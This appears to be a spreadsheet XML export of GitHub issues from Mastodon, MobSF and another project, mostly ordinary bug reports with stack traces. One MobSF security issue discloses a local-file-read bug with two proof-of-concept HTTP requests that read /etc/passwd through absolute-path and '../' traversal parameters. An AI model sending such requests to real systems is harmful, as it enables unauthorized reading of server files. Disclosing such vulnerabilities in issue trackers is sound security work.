    <t xml:space="preserve"> Steps to reproduce the problem 1. Export a user's archive 2. Download &amp; extract the archive 3. Look at outbox.json 4. There's two "orderedItems" keys! ![image](https://github.com/user-attachments/assets/eb69d63e-eb76-462e-a0f1-69b4600337ca) (originally [reported on glitch-soc](https://github.com/glitch-soc/mastodon/issues/2787) but was told that it's also happening upstream)  Expected behaviour There should only be one "orderedItems" key  Actual behaviour There were two "orderedItems" keys, one of which was a blank array  Detailed description _No response_  Mastodon instance _No response_  Mastodon version v4.3.0-alpha.5+glitch  Technical details _No response_</t>
  </si>
  <si>
    <t>https://github.com/mastodon/mastodon/issues/32540</t>
  </si>
  <si>
    <t>Streaming healthcheck doesn't send headers to prevent caching</t>
  </si>
  <si>
    <t xml:space="preserve"> Steps to reproduce the problem Request to the streaming health check shouldn't be cached by intermediaries  Expected behaviour Responses have appropriate cache control headers  Actual behaviour They don't  Detailed description Ask @ThisIsMissEm  Mastodon instance _No response_  Mastodon version _No response_  Technical details If this is happening on your own Mastodon server, please fill out those: - Ruby version: (from `ruby --version`, eg. v3.3.5) - Node.js version: (from `node --version`, eg. v20.18.0)</t>
  </si>
  <si>
    <t>https://github.com/mastodon/mastodon/issues/33109</t>
  </si>
  <si>
    <t>Edits appear to fail to process with unresolvable mentions</t>
  </si>
  <si>
    <t xml:space="preserve"> Steps to reproduce the problem 1. Receive an `Update` with an unresolvable mention (ie domain is gone) 2. Job fails to process, so `Update` is never applied 3. See failed job in sidekick morgue Needs a fix akin to #29215  Expected behaviour Job will process successfully  Actual behaviour Job will fail to process  Detailed description Backtrace:  app/lib/request.rb:110:in `rescue in perform': failed to connect: No address for beta.mstdn.cf on https://beta.mstdn.cf/users/mariaressa (HTTP::ConnectionError) from app/lib/request.rb:107:in `perform' from app/helpers/jsonld_helper.rb:174:in `fetch_resource_without_id_validation' from app/helpers/jsonld_helper.rb:167:in `fetch_resource' from app/services/activitypub/fetch_remote_actor_service.rb:18:in `call' from app/services/activitypub/fetch_remote_account_service.rb:6:in `call' from app/services/activitypub/process_status_update_service.rb:198:in `block in update_mentions!' from app/services/activitypub/process_status_update_service.rb:194:in `each' from app/services/activitypub/process_status_update_service.rb:194:in `update_mentions!' from app/services/activitypub/process_status_update_service.rb:182:in `update_metadata!' from app/services/activitypub/process_status_update_service.rb:45:in `block (2 levels) in handle_explicit_update!' from app/services/activitypub/process_status_update_service.rb:40:in `block in handle_explicit_update!' from app/models/concerns/lockable.rb:12:in `block (2 levels) in with_redis_lock' from app/models/concerns/lockable.rb:10:in `block in with_redis_lock' from app/lib/redis_connection.rb:10:in `with' from app/models/concerns/redisable.rb:9:in `with_redis' from app/models/concerns/lockable.rb:9:in `with_redis_lock'  13 levels /home/mastodon/live/app/lib/request.rb:328:in `open': failed to connect: No address for beta.mstdn.cf (HTTP::ConnectionError) from /home/mastodon/live/app/lib/request.rb:24:in `connect' from /home/mastodon/live/vendor/bundle/ruby/3.3.0/gems/http-5.2.0/lib/http/connection.rb:42:in `initialize' from /home/mastodon/live/vendor/bundle/ruby/3.3.0/gems/httplog-1.7.0/lib/httplog/adapters/http.rb:49:in `initialize' from /home/mastodon/live/vendor/bundle/ruby/3.3.0/gems/http-5.2.0/lib/http/client.rb:70:in `new' from /home/mastodon/live/vendor/bundle/ruby/3.3.0/gems/http-5.2.0/lib/http/client.rb:70:in `perform' from /home/mastodon/live/vendor/bundle/ruby/3.3.0/gems/httplog-1.7.0/lib/httplog/adapters/http.rb:12:in `block (2 levels) in &lt;class:Client&gt;' from /home/mastodon/.rbenv/versions/3.3.5/lib/ruby/3.3.0/benchmark.rb:313:in `realtime' from /home/mastodon/live/vendor/bundle/ruby/3.3.0/gems/httplog-1.7.0/lib/httplog/adapters/http.rb:11:in `block in &lt;class:Client&gt;' from /home/mastodon/live/vendor/bundle/ruby/3.3.0/gems/http-5.2.0/lib/http/client.rb:31:in `request' from /home/mastodon/live/app/lib/request.rb:108:in `perform' from /home/mastodon/live/app/helpers/jsonld_helper.rb:174:in `fetch_resource_without_id_validation' from /home/mastodon/live/app/helpers/jsonld_helper.rb:167:in `fetch_resource' from /home/mastodon/live/app/services/activitypub/fetch_remote_actor_service.rb:18:in `call' from /home/mastodon/live/app/services/activitypub/fetch_remote_account_service.rb:6:in `call' from /home/mastodon/live/app/services/activitypub/process_status_update_service.rb:198:in `block in update_mentions!' from /home/mastodon/live/app/services/activitypub/process_status_update_service.rb:194:in `each'  64 levels /home/mastodon/live/app/lib/request.rb:328:in `open': No address for beta.mstdn.cf (SocketError) from /home/mastodon/live/app/lib/request.rb:24:in `connect' from /home/mastodon/live/vendor/bundle/ruby/3.3.0/gems/http-5.2.0/lib/http/connection.rb:42:in `initialize' from /home/mastodon/live/vendor/bundle/ruby/3.3.0/gems/httplog-1.7.0/lib/httplog/adapters/http.rb:49:in `initialize' from /home/mastodon/live/vendor/bundle/ruby/3.3.0/gems/http-5.2.0/lib/http/client.rb:70:in `new' from /home/mastodon/live/vendor/bundle/ruby/3.3.0/gems/http-5.2.0/lib/http/client.rb:70:in `perform' from /home/mastodon/live/vendor/bundle/ruby/3.3.0/gems/httplog-1.7.0/lib/httplog/adapters/http.rb:12:in `block (2 levels) in &lt;class:Client&gt;' from /home/mastodon/.rbenv/versions/3.3.5/lib/ruby/3.3.0/benchmark.rb:313:in `realtime' from /home/mastodon/live/vendor/bundle/ruby/3.3.0/gems/httplog-1.7.0/lib/httplog/adapters/http.rb:11:in `block in &lt;class:Client&gt;' from /home/mastodon/live/vendor/bundle/ruby/3.3.0/gems/http-5.2.0/lib/http/client.rb:31:in `request' from /home/mastodon/live/app/lib/request.rb:108:in `perform' from /home/mastodon/live/app/helpers/jsonld_helper.rb:174:in `fetch_resource_without_id_validation' from /home/mastodon/live/app/helpers/jsonld_helper.rb:167:in `fetch_resource' from /home/mastodon/live/app/services/activitypub/fetch_remote_actor_service.rb:18:in `call' from /home/mastodon/live/app/services/activitypub/fetch_remote_account_service.rb:6:in `call' from /home/mastodon/live/app/services/activitypub/process_status_update_service.rb:198:in `block in update_mentions!' from /home/mastodon/live/app/services/activitypub/process_status_update_service.rb:194:in `each'  64 levels   Mastodon instance raphus.social  Mastodon version v4.3.1  Technical details If this is happening on your own Mastodon server, please fill out those: - Ruby version: ruby 3.3.5 (2024-09-03 revision ef084cc8f4) [x86_64-linux] - Node.js version: v20.5.1</t>
  </si>
  <si>
    <t>https://github.com/mastodon/mastodon/issues/33357</t>
  </si>
  <si>
    <t>Featured hashtag last used date is incorrect for remote users</t>
  </si>
  <si>
    <t xml:space="preserve"> Steps to reproduce the problem 1. Load `/api/v1/accounts/[id]/featured_hashtags` with the ID of a remote user  Expected behaviour `last_status_at` should show the date of the most recent post from this user using that hashtag that is either public or viewable to the person making the query  Actual behaviour `last_status_at` shows a long ago date for a hashtag with recent public posts. I think `statuses_count` is also incorrect. I also found at least one example (possibly specific to the web UI) where a future date is displayed as the last usage date of a featured hashtag, even though the users posts are all dated correctly.  Detailed description Ive seen this frequently on multiple servers where it will either give a long ago date or even say no posts for a featured hashtag that someone uses very frequently. I can see the users posts just fine from the affected server so its not an issue of the posts not federating. When looking at my own featured hashtags on my own server, or looking at local users featured hashtags, the date appears to be correct, only remote accounts seem to be affected. For example, https://mastodon.social/api/v1/accounts/109281825849025262/featured_tags should be the featured tags of my own mastodon.online account, viewed from mastodon.social. The `last_status_at` for the swiftui hashtag is `2024-02-19`, almost a year ago, but Ive posted about it several times since then, including in the last few days. Possibly related to #22665 where someone saw the `last_status_at` date getting updated correctly but not the `statuses_count`. In my case, the `last_status_at` is also incorrect.  Mastodon instance mastodon.social, mastodon.online, mastodon.gamedev.place  Mastodon version v4.4.0-nightly.2024-12-18, v4.3.2  Technical details _No response_</t>
  </si>
  <si>
    <t>https://github.com/mastodon/mastodon/issues/33742</t>
  </si>
  <si>
    <t>Streaming API and REST API language filtering is inconsistent</t>
  </si>
  <si>
    <t xml:space="preserve"> Steps to reproduce the problem 1. select chosen languages in `/settings/preferences/other` 2. open the public timeline 3. observe new posts appearing 4. refresh page  Expected behaviour refreshing the page should result in the same posts  Actual behaviour streaming gets more posts than REST API  Detailed description At first glance, this seems to be due to the language filtering logic being different in the streaming server (`streamFrom` function) and the Ruby server (`PublicFeed#language_scope`): - the streaming code treats posts with an unknown language as acceptable (`payload.language !== null `) - when language filtering is enabled, the Ruby code does not return posts with `language: nil`  Mastodon instance mastodon.social  Mastodon version v4.3.0  Technical details _No response_</t>
  </si>
  <si>
    <t>https://github.com/MobSF/Mobile-Security-Framework-MobSF/issues/842</t>
  </si>
  <si>
    <t>Recent Scans: Scan Time</t>
  </si>
  <si>
    <t>There is no time field in recent scan.I think the time field is important for apk scanning.It is recommended to add this field in recent scan.Thank you.</t>
  </si>
  <si>
    <t>https://github.com/MobSF/Mobile-Security-Framework-MobSF/issues/1197</t>
  </si>
  <si>
    <t>[Security] Local file reading regression &lt; 3.0.0</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- ## IMPORTANT --&gt; &lt;!-- If you see errors while running setup/run scripts, it is mostly because you haven't installed the required dependencies correctly. You will have to look into the errors and figure out what is causing them and solve them accordingly. Make sure you have installed all the required dependencies and their correct versions as per the latest documentation. If you still find yourself at a dead end, join MobSF Slack channel: http://tiny.cc/mobsf Please do not post support/help request in GitHub issues, doing so will definitely waste our time get them closed without further response. --&gt; ## ENVIRONMENT  Docker latest version  ## EXPLANATION OF THE ISSUE It is possible to read any file on the system. ## STEPS TO REPRODUCE THE ISSUE 1st poc (specify absolute path):  GET /ViewFile/?file=/etc/passwd&amp;md5=376a1470cd79dc44a96615337c5b51c2&amp;type=ios HTTP/1.1 Host: 0.0.0.0:8000 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3971.0 Safari/537.36 autochrome/blue Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close  2nd poc (specify path instead of real md5):  GET /ViewFile/?file=etc/passwd&amp;md5=../../../../../../../../../..&amp;type=ios HTTP/1.1 Host: 0.0.0.0:8000 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3971.0 Safari/537.36 autochrome/blue Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close </t>
  </si>
  <si>
    <t>https://github.com/MobSF/Mobile-Security-Framework-MobSF/issues/2043</t>
  </si>
  <si>
    <t>MobSF Static Analysis fails on apks upload via api</t>
  </si>
  <si>
    <t>&lt;!-- ## IMPORTANT --&gt; &lt;!-- Issues are ONLY for reporting BUGS. For support, feature requests, questions, queries, and discussions use our slack channel for limited support. Join MobSF Slack channel: https://join.slack.com/t/mobsf/shared_invite/zt-153nfus2r-hMCGrwzm8Lyy3OxsihnolQ --&gt; &lt;!-- If you see errors while running setup/run scripts, it is mostly because you haven't installed the required dependencies correctly. You will have to look into the errors and figure out what is causing them and solve them accordingly. Make sure you have installed all the required dependencies and their correct versions as per the latest documentation. If you still find yourself at a dead end, join MobSF Slack channel:https://join.slack.com/t/mobsf/shared_invite/zt-153nfus2r-hMCGrwzm8Lyy3OxsihnolQ Please do not post support/help request in GitHub issues, doing so will definitely waste our time get them closed without further response. --&gt; ## ENVIRONMENT  OS and Version: Ubuntu 22.04.1 LTS (GNU/Linux 5.15.0-48-generic x86_64) Python Version: Python 3.10.6 MobSF Version: VERSION = '3.5.2'  ## EXPLANATION OF THE ISSUE We are using MobSF via a git clone of master, with the latest pulled down. When attempting to upload an apks file via curl to the /scan endpoint, a 500 is returned, with the below error in the logs. According to #1728 and the [releases page](https://github.com/MobSF/Mobile-Security-Framework-MobSF/releases), the apks format has been supported since v3.4.6 Beta. Looking through the code changes for that support, it appears that api_static_analysis.py did not get updated to support the addition of .apks files. I'm mostly just curious if this was intentional or a mistake. &lt;!-- If you see errors while running setup/run scripts, join MobSF Slack channel: https://bit.ly/3mCMNOx to get limited support. --&gt; ## STEPS TO REPRODUCE THE ISSUE  1. Upload apks file using curl to /api/v1/scan with scan_type=apks 2. View MobSF logs.  ## LOG FILE  __ __ _ ____ _____ _____ ____ | \/ | ___ | |__/ ___|| ___|_ _|___ / | ___| | |\/| |/ _ \| '_ \___ \| |_ \ \ / / |_ \ |___ \ | | | | (_) | |_) |__) | _| \ V / ___) | ___) | |_| |_|\___/|_.__/____/|_| \_/ |____(_)____/ [INFO] 03/Oct/2022 21:24:08 - ESC[1mESC[34mMobile Security Framework v3.5.2 BetaESC[0m [INFO] 03/Oct/2022 21:24:08 - OS: Linux [INFO] 03/Oct/2022 21:24:08 - Platform: Linux-5.15.0-48-generic-x86_64-with-glibc2.35 [INFO] 03/Oct/2022 21:24:08 - Dist: ubuntu 22.04 Jammy Jellyfish [INFO] 03/Oct/2022 21:24:08 - MobSF Basic Environment Check [WARNING] 03/Oct/2022 21:24:08 - Dynamic Analysis related functions will not work. Make sure a Genymotion Android VM/Android Studio Emulator is running before performing Dynamic Analysis. [INFO] 03/Oct/2022 21:24:09 - Checking for Update. [INFO] 03/Oct/2022 21:24:09 - No updates available. [ERROR] 03/Oct/2022 21:24:20 - Internal Server Error: /api/v1/scan Traceback (most recent call last): File "/opt/Mobile-Security-Framework-MobSF/venv/lib/python3.10/site-packages/django/core/handlers/exception.py", line 55, in inner response = get_response(request) File "/opt/Mobile-Security-Framework-MobSF/venv/lib/python3.10/site-packages/django/core/handlers/base.py", line 197, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/opt/Mobile-Security-Framework-MobSF/mobsf/MobSF/views/helpers.py", line 92, in wrapper return func(*args, **kwargs) File "/opt/Mobile-Security-Framework-MobSF/venv/lib/python3.10/site-packages/django/views/decorators/csrf.py", line 54, in wrapped_view return view_func(*args, **kwargs) File "/opt/Mobile-Security-Framework-MobSF/mobsf/MobSF/views/api/api_static_analysis.py", line 76, in api_scan return response UnboundLocalError: local variable 'response' referenced before assignment  &lt;!-- BEFORE POSTING YOUR ISSUE/BUG - These comments won't show up when you submit the issue. - GitHub issues ARE NOT FOR FEATURE REQUESTS, SUPPORT, DISCUSSIONS AND QUESTIONS! - If you have questions, use our slack channel. Join MobSF Slack channel: https://bit.ly/3mCMNOx - Reproduce issue in the latest master and try to add as much detail as possible. - Search this repository (top of the page) for the issue and it has not been fixed or reported already. - Once you open a bug, you should also provide additional information if requested. - Failure to do so in 25 days will result in closure of the bug without further communication. --&gt;</t>
  </si>
  <si>
    <t>https://github.com/MobSF/Mobile-Security-Framework-MobSF/issues/2424</t>
  </si>
  <si>
    <t>Allow numeric bundleIds for iOS</t>
  </si>
  <si>
    <t xml:space="preserve">## ENVIRONMENT  OS and Version: MacOS Sonoma, but running in docker Python Version: 3.10 MobSF Version: 4.0.5  ## EXPLANATION OF THE ISSUE  Uploading an iOS build with a numeric bundleId will result in issues opening "/recent_scans" . The error message is already stating, that the used regex is not capable of finding numeric bundleIds.  ## STEPS TO REPRODUCE THE ISSUE  1. upload ipa with numeric bundleId 2. open mobsf interface 3. click on "Recent Scans" 4. observe "Server Error (500)".  ## LOG FILE  [INFO] 17/Sep/2024 10:18:06 - __ __ _ ____ _____ _ _ ___ | \/ | ___ | |__/ ___|| ___|_ _| || | / _ \ | |\/| |/ _ \| '_ \___ \| |_ \ \ / / || |_| | | | | | | | (_) | |_) |__) | _| \ V /|__ _| |_| | |_| |_|\___/|_.__/____/|_| \_/ |_|(_)___/ [INFO] 17/Sep/2024 10:18:06 - Author: Ajin Abraham | opensecurity.in [INFO] 17/Sep/2024 10:18:06 - Mobile Security Framework v4.0.5 [INFO] 17/Sep/2024 10:18:06 - API Key read from environment variable REST API Key:  Default Credentials: mobsf/mobsf [INFO] 17/Sep/2024 10:18:06 - OS Environment: Linux (ubuntu 22.04 Jammy Jellyfish) Linux-6.6.26-linuxkit-aarch64-with-glibc2.35 [INFO] 17/Sep/2024 10:18:06 - MobSF Basic Environment Check [INFO] 17/Sep/2024 10:18:06 - Checking for Update. [INFO] 17/Sep/2024 10:18:06 - No updates available. [INFO] 17/Sep/2024 10:18:10 - API Key read from environment variable [ERROR] 17/Sep/2024 10:18:12 - Internal Server Error: /recent_scans/ Traceback (most recent call last): File "/usr/local/lib/python3.10/dist-packages/django/core/handlers/exception.py", line 55, in inner response = get_response(request) File "/usr/local/lib/python3.10/dist-packages/django/core/handlers/base.py", line 197, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/mobsf/Mobile-Security-Framework-MobSF/mobsf/MobSF/views/authentication.py", line 41, in wrapper return lg(func)(request, *args, **kwargs) File "/usr/local/lib/python3.10/dist-packages/django/contrib/auth/decorators.py", line 23, in _wrapper_view return view_func(request, *args, **kwargs) File "/home/mobsf/Mobile-Security-Framework-MobSF/mobsf/MobSF/views/home.py", line 309, in recent_scans return render(request, template, context) File "/usr/local/lib/python3.10/dist-packages/django/shortcuts.py", line 25, in render content = loader.render_to_string(template_name, context, request, using=using) File "/usr/local/lib/python3.10/dist-packages/django/template/loader.py", line 62, in render_to_string return template.render(context, request) File "/usr/local/lib/python3.10/dist-packages/django/template/backends/django.py", line 61, in render return self.template.render(context) File "/usr/local/lib/python3.10/dist-packages/django/template/base.py", line 171, in render return self._render(context) File "/usr/local/lib/python3.10/dist-packages/django/template/base.py", line 163, in _render return self.nodelist.render(context) File "/usr/local/lib/python3.10/dist-packages/django/template/base.py", line 1000, in render return SafeString("".join([node.render_annotated(context) for node in self])) File "/usr/local/lib/python3.10/dist-packages/django/template/base.py", line 1000, in &lt;listcomp&gt; return SafeString("".join([node.render_annotated(context) for node in self])) File "/usr/local/lib/python3.10/dist-packages/django/template/base.py", line 961, in render_annotated return self.render(context) File "/usr/local/lib/python3.10/dist-packages/django/template/loader_tags.py", line 159, in render return compiled_parent._render(context) File "/usr/local/lib/python3.10/dist-packages/django/template/base.py", line 163, in _render return self.nodelist.render(context) File "/usr/local/lib/python3.10/dist-packages/django/template/base.py", line 1000, in render return SafeString("".join([node.render_annotated(context) for node in self])) File "/usr/local/lib/python3.10/dist-packages/django/template/base.py", line 1000, in &lt;listcomp&gt; return SafeString("".join([node.render_annotated(context) for node in self])) File "/usr/local/lib/python3.10/dist-packages/django/template/base.py", line 961, in render_annotated return self.render(context) File "/usr/local/lib/python3.10/dist-packages/django/template/loader_tags.py", line 65, in render result = block.nodelist.render(context) File "/usr/local/lib/python3.10/dist-packages/django/template/base.py", line 1000, in render return SafeString("".join([node.render_annotated(context) for node in self])) File "/usr/local/lib/python3.10/dist-packages/django/template/base.py", line 1000, in &lt;listcomp&gt; return SafeString("".join([node.render_annotated(context) for node in self])) File "/usr/local/lib/python3.10/dist-packages/django/template/base.py", line 961, in render_annotated return self.render(context) File "/usr/local/lib/python3.10/dist-packages/django/template/defaulttags.py", line 242, in render nodelist.append(node.render_annotated(context)) File "/usr/local/lib/python3.10/dist-packages/django/template/base.py", line 961, in render_annotated return self.render(context) File "/usr/local/lib/python3.10/dist-packages/django/template/defaulttags.py", line 326, in render return nodelist.render(context) File "/usr/local/lib/python3.10/dist-packages/django/template/base.py", line 1000, in render return SafeString("".join([node.render_annotated(context) for node in self])) File "/usr/local/lib/python3.10/dist-packages/django/template/base.py", line 1000, in &lt;listcomp&gt; return SafeString("".join([node.render_annotated(context) for node in self])) File "/usr/local/lib/python3.10/dist-packages/django/template/base.py", line 961, in render_annotated return self.render(context) File "/usr/local/lib/python3.10/dist-packages/django/template/defaulttags.py", line 326, in render return nodelist.render(context) File "/usr/local/lib/python3.10/dist-packages/django/template/base.py", line 1000, in render return SafeString("".join([node.render_annotated(context) for node in self])) File "/usr/local/lib/python3.10/dist-packages/django/template/base.py", line 1000, in &lt;listcomp&gt; return SafeString("".join([node.render_annotated(context) for node in self])) File "/usr/local/lib/python3.10/dist-packages/django/template/base.py", line 961, in render_annotated return self.render(context) File "/usr/local/lib/python3.10/dist-packages/django/template/defaulttags.py", line 326, in render return nodelist.render(context) File "/usr/local/lib/python3.10/dist-packages/django/template/base.py", line 1000, in render return SafeString("".join([node.render_annotated(context) for node in self])) File "/usr/local/lib/python3.10/dist-packages/django/template/base.py", line 1000, in &lt;listcomp&gt; return SafeString("".join([node.render_annotated(context) for node in self])) File "/usr/local/lib/python3.10/dist-packages/django/template/base.py", line 961, in render_annotated return self.render(context) File "/usr/local/lib/python3.10/dist-packages/django/template/defaulttags.py", line 479, in render url = reverse(view_name, args=args, kwargs=kwargs, current_app=current_app) File "/usr/local/lib/python3.10/dist-packages/django/urls/base.py", line 88, in reverse return resolver._reverse_with_prefix(view, prefix, *args, **kwargs) File "/usr/local/lib/python3.10/dist-packages/django/urls/resolvers.py", line 851, in _reverse_with_prefix raise NoReverseMatch(msg) django.urls.exceptions.NoReverseMatch: Reverse for 'ios_view_report' with keyword arguments '{'bundle_id': '12345678'}' not found. 1 pattern(s) tried: ['ios/view_report/(?P&lt;bundle_id&gt;([a-zA-Z]{1}[\\w.-]{1,255}))$'] </t>
  </si>
  <si>
    <t>https://github.com/MobSF/Mobile-Security-Framework-MobSF/issues/2432</t>
  </si>
  <si>
    <t>Frida API Monitor API is responding ERROR message for OK response</t>
  </si>
  <si>
    <t>&lt;!-- ## IMPORTANT --&gt; &lt;!-- Issues are ONLY for reporting BUGS. For support, feature requests, questions, queries, and discussions use our slack channel for limited support. Join MobSF Slack channel: https://join.slack.com/t/mobsf/shared_invite/zt-2huaz2nj9-ifViLV7g7w1xthx5D6rGhw --&gt; &lt;!-- If you see errors while running setup/run scripts, it is mostly because you haven't installed the required dependencies correctly. You will have to look into the errors and figure out what is causing them and solve them accordingly. Make sure you have installed all the required dependencies and their correct versions as per the latest documentation. If you still find yourself at a dead end, join MobSF Slack channel:https://join.slack.com/t/mobsf/shared_invite/zt-2huaz2nj9-ifViLV7g7w1xthx5D6rGhw Please do not post support/help request in GitHub issues, doing so will definitely waste our time get them closed without further response. --&gt; ## ENVIRONMENT  OS and Version: Ubuntu 20.04 Python Version: 3.11.9 MobSF Version: v4.0.7  ## EXPLANATION OF THE ISSUE I write a method to start Frida Instrumentation  def start_Frida_instrument(host_url, api_key, file_hash, default_hooks='api_monitor,ssl_pinning_bypass,root_bypass,debugger_check_bypass', auxiliary_hooks='', frida_code=''):  Start Frida to monitor API at runtime. @param host_url: @param api_key: @param file_hash: @return:  print("Starting Frida API instrument") api_url = host_url + "/api/v1/frida/instrument" headers = { "Authorization": api_key } data = { "hash": file_hash, "default_hooks": default_hooks, "auxiliary_hooks": auxiliary_hooks, "frida_code": frida_code } try: response = requests.post(api_url, headers=headers, data=data) if response.status_code == 200: return response.json() else: return {"error": response.json(), "status_code": response.status_code} except Exception as e: return {"error": str(e)}  However, when I execute this method, the response is **{'message': 'Failed to instrument app', 'status': 'ok'}**. Other methods I use are as follows:  def upload_file(host_url, api_key, file_path):  Upload apk file to the server @param host_url: ip:port of the server @param api_key: API key of MobSF @param file_path: file path of the apk @return:  print("Uploading file") multipart_data = MultipartEncoder(fields={'file': (file_path, open(file_path, 'rb'), 'application/octet-stream')}) headers = {'Content-Type': multipart_data.content_type, 'Authorization': api_key} response = requests.post(host_url + '/api/v1/upload', data=multipart_data, headers=headers) return response.text def scan_file(host_url, api_key, file_hash): print("Starting static scan") api_url = f"{host_url}/api/v1/scan" headers = { "Authorization": api_key, } data = { "hash": file_hash, } try: response = requests.post(api_url, headers=headers, data=data) if response.status_code == 200: return response.json() else: return {"error": response.text, "status_code": response.status_code} except Exception as e: return {"error": str(e)} def start_dynamic_analysis(host_url, api_key, file_hash, re_install=1, install=1):  Start dynamic analysis. @param host_url: @param api_key: @param file_hash: @param re_install: @param install: @return:  print("Starting dynamic analysis. Probably several minutes") api_url = host_url + "/api/v1/dynamic/start_analysis" headers = { "Authorization": api_key } data = { "hash": file_hash, "re_install": re_install, "install": install } try: response = requests.post(api_url, headers=headers, data=data) if response.status_code == 200: return response.json() else: print({"error": response.json(), "status_code": response.status_code}) return None except Exception as e: return None  &lt;!-- If you see errors while running setup/run scripts, join MobSF Slack channel: https://join.slack.com/t/mobsf/shared_invite/zt-2huaz2nj9-ifViLV7g7w1xthx5D6rGhw to get limited support. --&gt; ## STEPS TO REPRODUCE THE ISSUE  1. Upload an APK file via api. 2. Scan the APK and get the hash. 3. Start dynamic analysis via api. 4. Run the start_Frida_instrument method.  ## LOG FILE The info log is as follows:  [INFO] 10/Oct/2024 00:38:07 - Test Completed. Resuming HTTPS Proxy [INFO] 10/Oct/2024 00:38:07 - Installing MobSF RootCA [INFO] 10/Oct/2024 00:38:07 - Starting HTTPS Proxy on 1337 [INFO] 10/Oct/2024 00:38:07 - Starting Instrumentation [INFO] 10/Oct/2024 00:38:07 - Frida Server is already running [INFO] 10/Oct/2024 00:38:07 - Spawning com.FootballStadiumDesign.lukoni [ERROR] 10/Oct/2024 00:38:08 - Internal Server Error: /api/v1/frida/api_monitor [DEBUG] 10/Oct/2024 00:38:11 - [Frida] Loaded Frida Script - debugger_check_bypass [DEBUG] 10/Oct/2024 00:38:11 - [Frida] Loaded Frida Script - root_bypass [DEBUG] 10/Oct/2024 00:38:11 - [Frida] Loaded Frida Script - ssl_pinning_bypass [DEBUG] 10/Oct/2024 00:38:11 - [Frida] Loaded Frida Script - api_monitor [DEBUG] 10/Oct/2024 00:38:11 - [Frida] [SSL Pinning Bypass] okhttp CertificatePinner not found [DEBUG] 10/Oct/2024 00:38:11 - [Frida] [SSL Pinning Bypass] okhttp3 CertificatePinner not found [DEBUG] 10/Oct/2024 00:38:11 - [Frida] [SSL Pinning Bypass] DataTheorem trustkit not found [DEBUG] 10/Oct/2024 00:38:11 - [Frida] [SSL Pinning Bypass] Appcelerator PinningTrustManager not found [DEBUG] 10/Oct/2024 00:38:11 - [Frida] [SSL Pinning Bypass] Apache Cordova SSLCertificateChecker not found [DEBUG] 10/Oct/2024 00:38:11 - [Frida] [SSL Pinning Bypass] Wultra CertStore.validateFingerprint not found [DEBUG] 10/Oct/2024 00:38:11 - [Frida] [SSL Pinning Bypass] Xutils not found [DEBUG] 10/Oct/2024 00:38:11 - [Frida] [SSL Pinning Bypass] httpclientandroidlib not found [DEBUG] 10/Oct/2024 00:38:11 - [Frida] [SSL Pinning Bypass] Cronet not found [DEBUG] 10/Oct/2024 00:38:11 - [Frida] [SSL Pinning Bypass] certificatetransparency.CTInterceptorBuilder not found [DEBUG] 10/Oct/2024 00:38:11 - [Frida] [API Monitor] Cannot find org.apache.http.impl.client.AbstractHttpClient.execute [DEBUG] 10/Oct/2024 00:38:11 - [Frida] [API Monitor] Cannot find com.android.okhttp.internal.http.HttpURLConnectionImpl.getInputStream  &lt;!-- BEFORE POSTING YOUR ISSUE/BUG - These comments won't show up when you submit the issue. - GitHub issues ARE NOT FOR FEATURE REQUESTS, SUPPORT, DISCUSSIONS AND QUESTIONS! - If you have questions, use our slack channel. Join MobSF Slack channel: https://bit.ly/3mCMNOx - Reproduce issue in the latest master and try to add as much detail as possible. - Search this repository (top of the page) for the issue and it has not been fixed or reported already. - Once you open a bug, you should also provide additional information if requested. - Failure to do so in 25 days will result in closure of the bug without further communication. --&gt;</t>
  </si>
  <si>
    <t>https://github.com/MobSF/Mobile-Security-Framework-MobSF/issues/2464</t>
  </si>
  <si>
    <t>In the tasks list json the status field has different formats</t>
  </si>
  <si>
    <t>## ENVIRONMENT  MobSF Version: 4.2.4  ## EXPLANATION OF THE ISSUE when calling the api/v1/tasks endpoint, in the tasks lists the "status" field is either a string or an object depending on the status itself. This is a problem because the json format is coherent and it makes impossible to create a proper mapper for the object;</t>
  </si>
  <si>
    <t>https://github.com/kgrzybek/modular-monolith-with-ddd/issues/40</t>
  </si>
  <si>
    <t>Improve Problem Details response</t>
  </si>
  <si>
    <t>Change Problem Details according to @sm-g comment: @kgrzybek I'm reading your https://www.kamilgrzybek.com/design/rest-api-data-validation/ and found that `title` in problem details reponse which your code generates is different from case to case, which violates the RFC7807 (https://tools.ietf.org/html/rfc7807#section-3.1). `Title` is just function of `type` for humans. Better place for messages from validators is `details` or even custom extensions (see examples in https://tools.ietf.org/html/rfc7807#section-3) _Originally posted by @sm-g in https://github.com/kgrzybek/modular-monolith-with-ddd/issues/3#issuecomment-593063361_</t>
  </si>
  <si>
    <t>https://github.com/kgrzybek/modular-monolith-with-ddd/issues/47</t>
  </si>
  <si>
    <t>Serialized messages contains BackingField with duplicated data</t>
  </si>
  <si>
